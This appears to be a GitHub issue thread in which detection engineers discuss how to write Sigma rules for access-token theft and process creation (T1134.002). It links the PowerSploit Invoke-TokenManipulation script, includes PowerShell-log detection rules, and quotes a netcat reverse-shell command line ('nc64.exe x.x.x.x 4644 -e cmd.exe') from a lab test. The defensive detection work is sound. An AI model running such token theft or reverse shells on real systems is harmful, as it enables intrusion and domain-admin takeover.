Support needed for detection of creating new process using stolen access token T1134.002

[Jackson-Pollock]

Attack script: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-TokenManipulation.ps1
Any idea how to detect token manipulation?

[austinsonger]

You want a detection create from the script?

[Jackson-Pollock]

No I added that script for attack reference if anyone wants to know the attack in short. I posted this to get ideas on the detection as I couldn't figured it out.

[austinsonger]

Your best bet is to fork and attempt to work on a detection and create a pull request so then contributors can review it and get you input.

[Neo23x0]

The usual procedure to get to a rule is:

• setup a lab environment
• set a good audit policy and Sysmon configuration
• run the attack
• Look at the logs and try to find log entries that are unique to that type of attack
• Write a rule to detect these log entries

[Jackson-Pollock]

Hi @Neo23x0
Thanks for your reply!
I follow the same process, But specifically for this case (T1134.002) I need to observe behavior of WinAPI calls DuplicateToken(Ex) and CreateProcessWithTokenW and the relevant logs are not getting generated by Sysmon (Except Process access event 10: noisy and false positive) So I thought let's ask someone who can give suggestions.

[frack113]

just run some cmd for the help in a VM but not seem to work (no error or output)

logsource:
    product: windows
    category: ps_module
    definition: PowerShell Module Logging must be enabled
detection:
    selection:
        Payload|contains: 'Invoke-TokenManipulation'
    condition: selection

logsource:
    product: windows
    category: ps_script
    definition: Script block logging must be enabled
detection:
    selection:
        ScriptBlockText|contains: 'Invoke-TokenManipulation'
    condition: selection

[Jackson-Pollock]

This is just to monitor powershell script command Invoke-TokenManipulation but instead of monitoring this, we should better monitor the access token duplication and create process using token events and that part is very difficult. @Neo23x0 I need suggestions how to get the logs for this. Rest everything I can take care.

[Jackson-Pollock]

@frack113 This Invoke-TokenManipulation worked for me, I used access token of logged in domain admin to get cmd.exe reverse shell (CreateProcessWithTokenW) and got domain admin shell.

[Neo23x0]

So this is rather a Sysmon issue than a Sigma issue, right?
The problem is that we're unable to generate usable events regardless of the used Sysmon config.
It's rather a log source problem than a Sigma problem.

We're currently working on a Sigma based endpoint agent that we're going to release this December or January that uses ETW channels to apply Sigma rules. I'll forward that request to the team that works on that agent and ask them if they can see these events using ETW.

[Neo23x0]

I'd add more strings than Invoke-TokenManipulation to the rule. Strings that are less likely to be changed.

[Jackson-Pollock]

That's great news! ETW events are missing with current setup and that was the issue here. I posted this query just to get such inputs.
Thanks!

[frack113]

@Jackson-Pollock as you get the cmd.exe , don't you get any process_creation log for the cmd ?
I was thinking what values can have User ,ParentImage and ParentCommandLine ?
Thanks

[Jackson-Pollock]

@frack113 I get process logs obviously, but before process creation, that script is impersonating access token (DuplicateToken(Ex)) and then using that token to create process (CreateProcessWithTokenW). So for detection we will have to corelate all these events.
In my cmd reverse shell process event: User: domain\admin, ParentImage: C:\Windows\System32\cmd.exe, CommandLine: C:\nc64.exe x.x.x.x 4644 -e cmd.exe and ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\shell.cmd"

Please try Invoke-TokenManipulation and check if you can detect.

[frack113]

HI,
Need to rebuild a lab to test correctly 😢.
Was just curious If the process_creation was strange enought a make a detection.
Powershell log are not allways enable thanks to contract when you want to activate the seller's answer "The function is no longer guaranteed if it is activated" 😠